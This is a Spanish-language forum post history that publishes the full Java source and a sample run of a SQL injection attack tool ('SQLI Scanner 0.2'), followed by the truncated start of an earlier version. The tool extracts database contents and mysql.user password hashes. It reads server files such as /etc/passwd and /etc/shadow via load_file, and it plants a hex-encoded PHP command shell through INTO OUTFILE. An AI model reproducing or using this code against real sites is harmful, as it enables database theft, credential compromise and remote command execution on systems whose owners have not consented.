Mostrar Mensajes

#251

Java / [Java] SQLI Scanner 0.2

22 Enero 2013, 01:34 AM

Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados

Un ejemplo de uso :

Código [Seleccionar] Expandir
-- == SQLI Scanner 0.2 == -- [+] Page : http://localhost/sql.php?id= [+] Checking ... [+] Scanning ... [Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3 [Limit] : The site has 3 columns [Data] : The number 1 print data -- == OPTIONS == -- --== information_schema.tables ==-- [1] : Show tables [2] : Show columns [3] : Show DBS [4] : Show tables with other DB [5] : Show columns with other DB --== mysql.user ==-- [6] : Show users --== Others ==-- [7] : Fuzzing files with load_file [8] : Read a file with load_file [9] : Dump [10] : Informacion of the server [11] : Create a shell with into outfile [12] : Show Log [13] : Exit [Option] : 10 [+] Searching informaion ... [+] DB Version : 5.5.20-log [+] DB Name : hackman [+] Username : root@localhost [+] information_schema : on [+] mysqluser : on [-] load_file : off [+] Finished

El codigo es el siguiente :

Código (java) [Seleccionar] Expandir
// -- == -- == -- == ---- == // SQLI Scanner 0.2 || // -- == -- == -- == ---- == // (C) Doddy Hackman 2013 || // -- == -- == -- == ---- == import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { public static void main(String[] args) throws Exception { String target; Scanner host = new Scanner(System.in); installer(); System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n"); System.out.println("[+] Page : "); target = host.nextLine(); scan(target); //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers"); //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman"); //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers"); //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password"); //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt"); //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/"); } private static void manejo(String urla) throws Exception { while (true) { System.out.println("\n-- == OPTIONS == --\n"); System.out.println("--== information_schema.tables ==--"); System.out.println("[1] : Show tables"); System.out.println("[2] : Show columns"); System.out.println("[3] : Show DBS"); System.out.println("[4] : Show tables with other DB"); System.out.println("[5] : Show columns with other DB"); System.out.println("--== mysql.user ==--"); System.out.println("[6] : Show users"); System.out.println("--== Others ==--"); System.out.println("[7] : Fuzzing files with load_file"); System.out.println("[8] : Read a file with load_file"); System.out.println("[9] : Dump"); System.out.println("[10] : Informacion of the server"); System.out.println("[11] : Create a shell with into outfile"); System.out.println("[12] : Show Log"); System.out.println("[13] : Exit"); int op; Scanner host = new Scanner(System.in); System.out.println("\n[Option] :"); op = host.nextInt(); if (op == 1) { schematables(urla); continuar(); } else if (op == 2) { String coler; Scanner a = new Scanner(System.in); System.out.println("\n[+] Table : "); coler = a.nextLine(); schemacolumns(urla, coler); continuar(); } else if (op == 3) { getdbs(urla); continuar(); } else if (op == 4) { String tabler; Scanner a = new Scanner(System.in); System.out.println("\n[+] DB : "); tabler = a.nextLine(); getablesbydb(urla, tabler); continuar(); } else if (op == 5) { String dber; String tablerx; Scanner a = new Scanner(System.in); System.out.println("\n[+] DB : "); dber = a.nextLine(); Scanner b = new Scanner(System.in); System.out.println("\n[+] Table : "); tablerx = a.nextLine(); getcolbydb(urla, dber, tablerx); continuar(); } else if (op == 6) { mysqluser(urla); continuar(); } else if (op == 7) { fuzzfiles(urla); continuar(); } else if (op == 8) { String ar; Scanner f = new Scanner(System.in); System.out.println("\n[+] File : "); ar = f.nextLine(); openfile(urla, ar); continuar(); } else if (op == 9) { String a; String b; String c; Scanner m = new Scanner(System.in); System.out.println("\n[+] Table : "); a = m.nextLine(); Scanner n = new Scanner(System.in); System.out.println("\n[+] Column 1 : "); b = n.nextLine(); Scanner l = new Scanner(System.in); System.out.println("\n[+] Column 2 : "); c = l.nextLine(); dumper(urla, a, b, c); continuar(); } else if (op == 10) { details(urla); continuar(); } else if (op == 11) { String b; String c; Scanner m = new Scanner(System.in); System.out.println("\n[+] Full Path Discloure : "); b = m.nextLine(); Scanner n = new Scanner(System.in); System.out.println("\n[+] Directory to test : "); c = n.nextLine(); intofile(urla, b, c); continuar(); } else if (op == 12) { String ruta; URL h = new URL(urla); ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt"; System.out.println("\n[+] Check logs in : " + ruta); continuar(); } else if (op == 13) { System.out.println("\n-- == (C) Doddy Hackman 2013 == --"); continuar(); System.exit(1); } else { System.out.println("\n[-] Bad Option\n"); continuar(); } } } private static void continuar() throws Exception { System.out.println("\n[+] Finished\n"); Scanner chau = new Scanner(System.in); chau.nextLine(); } private static void installer() throws Exception { File crear = new File("logs"); if (!crear.isDirectory()) { crear.mkdirs(); } } private static void intofile(String urla, String fpd, String dir) throws Exception { String linea; String lugar; String lugardos; String webtest; String web1; String formandoweb; String code; linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"; lugar = fpd + "/cmd.php"; lugardos = dir + "/cmd.php"; URL h = new URL(urla); System.out.println("\n[+] Checking ...\n"); webtest = "http://" + h.getHost() + lugardos; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", linea); formandoweb = web1 + "+into+outfile+'" + lugar + "'--"; code = toma(formandoweb); code = toma(webtest); uno = Pattern.compile("Mini Shell By Doddy"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[Shell UP] : " + webtest); savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n"); } else { System.out.println("[-] Error"); } } private static void openfile(String urla, String file) throws Exception { String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; archivo = encodehex(file); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); System.out.println("\n[+] Reading ...\n"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] File Found : " + file); System.out.println("\n[Source Start]\n"); System.out.println(dos.group(1)); System.out.println("\n[Source End]\n"); savefile(urla, "\r\n" + "[+] File Found : " + file); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } else { System.out.println("[-] Not Found"); } } private static void fuzzfiles(String urla) throws Exception { String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"}; String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; System.out.println("\n[+] Searching files with load_file() ....\n"); for (int count = 0; count < archivos.length; count++) { archivo = encodehex(archivos[count]); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] File Found : " + archivos[count]); System.out.println("\n[Source Start]\n"); System.out.println(dos.group(1)); System.out.println("\n[Source End]\n"); savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } } } private static void dumper(String urla, String tabla, String col1, String col2) throws Exception { String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))"); code = toma(web1 + "+from+" + tabla + "--"); System.out.println("\n[+] Getting Values ..."); uno = Pattern.compile("K0BRA(.*?)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Values Founds : " + dos.group(1)); savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] " + col1 + " : " + dos.group(1)); System.out.println("[+] " + col2 + " : " + dos.group(2)); savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1)); savefile(urla, "[+] " + col2 + " : " + dos.group(2)); } } } else { System.out.println("[-] Not Found"); } } private static void mysqluser(String urla) throws Exception { String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))"); System.out.println("\n[+] Searching mysql.user ...."); code = toma(web1 + "+from+mysql.user--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Users Found : " + dos.group(1)); savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Host : " + dos.group(1)); System.out.println("[+] Username : " + dos.group(2)); System.out.println("[+] Password : " + dos.group(3)); savefile(urla, "\r\n" + "[+] Host : " + dos.group(1)); savefile(urla, "[+] Username : " + dos.group(2)); savefile(urla, "[+] Password : " + dos.group(3)); } } } else { System.out.println("[-] Not Found"); } } private static void getcolbydb(String urla, String db, String tab) throws Exception { String web1; String web2; String code; String dbf; String table; int x; Pattern uno = null; Matcher dos = null; dbf = encodehex(db); table = encodehex(tab); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); System.out.println("\n[+] Getting Columns ...."); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n"); savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] Column Found : " + dos.group(1)); savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { System.out.println("[-] Not Found"); } } private static void getablesbydb(String urla, String db) throws Exception { String web1; String web2; String code; String data; int x; Pattern uno = null; Matcher dos = null; data = encodehex(db); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); System.out.println("\n[+] Getting Tables ...."); code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n"); savefile(urla, "\r\n" + "[DB] : " + db + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] Table Found : " + dos.group(1)); savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { System.out.println("[-] Not Found"); } } private static void getdbs(String urla) throws Exception { String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))"); System.out.println("\n[+] Getting DBS ...."); code = toma(web1 + "+from+information_schema.schemata--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n"); savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] DB Found : " + dos.group(1)); savefile(urla, "[+] DB Found : " + dos.group(1)); } } } else { System.out.println("[-] Not Found"); } } private static void schemacolumns(String urla, String nombre) throws Exception { String web1; String web2; String code; String tablexa; int x; Pattern uno = null; Matcher dos = null; tablexa = encodehex(nombre); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); System.out.println("\n[+] Getting columns ...."); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n"); savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n"); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] Column Found : " + dos.group(1)); savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { System.out.println("[-] Not Found"); } } private static void schematables(String urla) throws Exception { String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); System.out.println("\n[+] Getting tables ....\n"); code = toma(web1 + "+from+information_schema.tables--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] Tables Found : " + dos.group(1) + "\n"); savefile(urla, ""); int finals = Integer.parseInt(dos.group(1)); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] Table Found : " + dos.group(1)); savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { System.out.println("[-] Not Found"); } } private static void scan(String urla) throws Exception { String codex; String target; Pattern uno = null; Matcher dos = null; target = urla; System.out.println("\n[+] Checking ...\n"); codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { System.out.println("[+] Scanning ...\n"); int x; String urlfinal; String otrofinal; String code; String formariny; String otroformar; String link; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; System.out.println("[Target] : " + link); System.out.println("[Limit] : The site has " + x + " columns"); System.out.println("[Data] : The number " + dos.group(1) + " print data"); savefile(link, "\r\n" + "[Target] : " + link); savefile(link, "[Limit] : The site has " + x + " columns"); savefile(link, "[Data] : The number " + dos.group(1) + " print data"); manejo(link); System.exit(1); } } System.out.println("[-] Error"); } else { System.out.println("[-] Not vulnerable"); } } private static void details(String urla) throws Exception { String concat; String code; Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); System.out.println("\n[+] Searching informaion ...\n"); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] DB Version : " + dos.group(1)); System.out.println("[+] DB Name : " + dos.group(2)); System.out.println("[+] Username : " + dos.group(3)); savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1)); savefile(urla, "[+] DB Name : " + dos.group(2)); savefile(urla, "[+] Username : " + dos.group(3)); } else { System.out.println("[-] Not found any data"); } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] information_schema : on"); savefile(urla, "[+] information_schema : on"); } else { System.out.println("[-] information_schema : off"); } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[+] mysqluser : on"); savefile(urla, "[+] mysqluser : on"); } else { System.out.println("[-] mysquser : off"); } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System.out.println("[-] load_file : on"); savefile(urla, "[-] load_file : on"); } else { System.out.println("[-] load_file : off"); } } private static void savefile(String nombre, String texto) throws Exception { String formar; URL h = new URL(nombre); formar = "logs/" + h.getHost() + ".txt"; FileWriter writer = new FileWriter(formar, true); writer.write(texto + "\r\n"); writer.close(); } private static String toma(String urla) throws Exception { String re; StringBuffer conte = new StringBuffer(40); URL url = new URL(urla); URLConnection hc = url.openConnection(); hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); BufferedReader nave = new BufferedReader( new InputStreamReader(hc.getInputStream())); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } public static String encodehex(String text) { //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); StringBuffer h = new StringBuffer(); String l; int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; l = Integer.toHexString(u); h.append(l); } return "0x" + h.toString(); } } //The End ?

#252

Java / Re: [Java] SQL Scanner 0.1

13 Enero 2013, 21:34 PM

si , me gusta hacer traducciones , hago el mismo programa en todos los lenguajes que conozco , eso si , el proximo codigo que publique le agrego un ejemplo de uso.

pd : le agregue el ejemplo de uso al post.

#253

Java / [Java] SQL Scanner 0.1

13 Enero 2013, 03:40 AM

Un simple Scanner SQLI hecho en Java.

Código (java) [Seleccionar]


//SQL Scanner 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {


        String codex;
        String target;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
        System.out.println("[+] Page : ");
        target = host.nextLine();

        System.out.println("\n[+] Checking ...\n");

        codex = toma(target + "-1+union+select+666--");

        uno = Pattern.compile("The used SELECT statements have a different number of columns");
        dos = uno.matcher(codex);

        if (dos.find()) {
            System.out.println("[+] Scanning ...\n");

            int x;
            String urlfinal;
            String otrofinal;
            String code;
            String formariny;
            String otroformar;
            String link;

